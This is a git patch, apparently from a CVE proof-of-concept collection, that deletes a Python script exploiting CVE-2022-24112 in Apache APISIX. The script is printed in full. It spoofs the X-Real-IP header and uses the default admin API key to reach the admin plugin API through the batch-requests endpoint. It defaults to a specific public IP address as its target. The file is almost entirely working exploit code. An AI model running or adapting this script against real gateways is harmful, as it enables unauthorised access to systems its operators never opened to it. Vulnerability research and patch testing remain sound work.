From 817ef937e1bc052c5b4b489ffd4c6acb095ab75d Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Tue, 14 Mar 2023 09:38:25 +0800 Subject: [PATCH] Update Floder Status. --- cve/apache-APISIX/CVE-2022-24112.py | 37 ----------------------------- 1 file changed, 37 deletions(-) delete mode 100644 cve/apache-APISIX/CVE-2022-24112.py diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py deleted file mode 100644 index 47aecefb..00000000 --- a/cve/apache-APISIX/CVE-2022-24112.py +++ /dev/null @@ -1,37 +0,0 @@ -import requests -from secrets import token_hex -import argparse -# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE - -# get poc from biu ~ - -def poc(host, port=443): - scheme = 'https' if '443' in str(port) else 'http' - target = '{}://{}:{}'.format(scheme, host, port) - token = token_hex(10) - uris = ['/apisix/batch-requests', '/api-gw/batch'] - hits = [f'failed to load plugin {token}'] - data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'}, - 'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]} - - try: - targets = ['{}{}'.format(target, uri) for uri in uris] - with requests.Session() as session: - for target in targets: - response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"}) - for hit in hits: - if hit in response.text: - output = response.json() - - return True, host, target, output - except Exception as error: - return False - return False -''' -''' -parser = argparse.ArgumentParser(description='test') -parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址') -parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口') -args = parser.parse_args() -print (poc(host=args.ip, port=args.port)) - -- Gitee